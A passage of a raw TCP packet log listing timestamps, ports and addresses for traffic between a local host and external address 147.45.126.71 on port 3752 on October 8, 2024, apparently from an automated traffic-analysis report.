Oct 8, 2024 20:52:32.552329063 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552330971 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.552344084 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552359104 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552371979 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552383900 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552397966 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552402973 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.552402973 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.552402973 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.552412987 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552428007 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552439928 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.552442074 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552457094 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552469969 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552479982 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.552484989 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552501917 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.552521944 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.552567959 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552582026 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552596092 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552613974 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552628994 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.552634954 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552649021 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552661896 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552674055 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552687883 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552709103 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552722931 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552736998 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552758932 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552772045 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552787066 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552799940 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552814007 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552825928 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552839041 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552851915 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552865028 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552879095 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552892923 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552907944 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552922010 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552928925 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.552939892 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552961111 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552974939 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.552988052 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.553009033 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.553021908 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.553035021 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.553049088 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.553062916 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.553078890 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.553215027 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.553229094 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.553312063 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.553343058 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.553355932 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.553426981 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.553441048 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.553455114 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.553467989 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.553519964 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.553601027 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.553613901 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.553627968 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.553641081 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.553653955 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.553667068 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.553680897 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.553694010 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.553706884 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.553792000 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.553806067 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.553817987 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.553833008 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.553844929 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.553858995 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.553874016 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.554147959 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.554390907 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.565493107 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.565493107 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.565538883 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.639898062 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.639914036 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.639930010 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.639950991 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.639965057 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.639978886 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.639993906 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640044928 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640058041 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640072107 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640084028 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640098095 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640111923 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640126944 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640141964 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640155077 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640171051 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640185118 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640207052 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640228033 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640280962 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640294075 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640307903 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640321016 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640377998 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640392065 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640405893 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640428066 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640440941 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640455961 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640475988 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640489101 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640502930 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640516996 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640530109 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640543938 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640556097 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640571117 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640583992 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640604973 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640619040 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640633106 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640646935 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640660048 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640683889 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640697002 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640711069 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640724897 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640738010 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640753984 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640768051 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640782118 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640794992 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640808105 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640904903 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640918970 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640933037 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640944958 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640959024 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640973091 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640974998 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.640985966 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.640999079 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.641014099 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.641043901 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.641057968 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.641071081 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.641084909 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.641098976 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.641113997 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.641128063 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.641140938 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.641156912 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.641170979 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.641201019 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.641216040 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.641237020 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.641251087 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.641263962 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.641263962 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.641263962 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.641263962 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.641263962 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.641263962 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.641263962 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.641267061 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.641282082 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.641298056 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.641310930 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.641324043 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.641331911 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.641347885 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.641361952 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.641381979 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.641396999 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.641412020 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.641424894 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.641438961 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.641454935 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.641468048 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.641550064 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.641550064 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.641550064 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.641550064 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.641550064 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.641550064 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.641550064 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.641612053 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.641757965 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.641772032 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.641784906 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.641902924 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.641916990 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.641917944 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.641932011 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.641944885 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.641964912 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.641978979 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.641985893 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.641985893 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.641993046 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.642007113 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.642020941 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.642035007 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.642049074 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.642062902 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.642075062 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.642088890 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.642088890 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.642115116 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.642307997 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.726747036 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.726784945 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.726799011 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.726814032 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.726895094 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.726917982 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.727029085 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.727132082 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.727165937 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.727273941 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.727288008 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.727336884 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.727349997 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.727365017 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.727380037 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.727404118 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.727426052 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.727432013 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.727447033 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.727468014 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.727480888 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.727494955 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.727508068 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.727521896 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.727541924 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.727555037 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.727567911 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.727581024 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.727595091 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.727691889 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.727705002 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.727719069 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.727731943 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.727745056 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.727760077 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.727780104 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.727793932 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.727807045 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.727821112 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.727834940 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.727847099 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.727863073 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.727890015 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.727890015 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.727921963 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.727935076 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.727955103 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.727968931 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.727982998 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.727996111 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728010893 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728023052 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728037119 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728049994 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728064060 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728079081 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728091955 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728115082 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728123903 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.728137970 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728151083 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728164911 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728178024 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728192091 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728195906 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.728205919 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728220940 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728235006 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728246927 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728261948 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728277922 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728291035 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728305101 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728324890 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728338957 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728353024 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728367090 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728380919 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728394985 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728410006 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728458881 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728478909 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728492975 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728508949 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728522062 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728535891 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728549004 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728562117 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728566885 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.728575945 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728590965 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728619099 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728631973 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728646040 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728660107 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728702068 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728717089 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728738070 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728751898 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728765011 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728779078 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728802919 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728809118 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.728818893 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728832960 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728847027 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.728859901 CEST	3752	49716	147.45.126.71	192.168.2.8
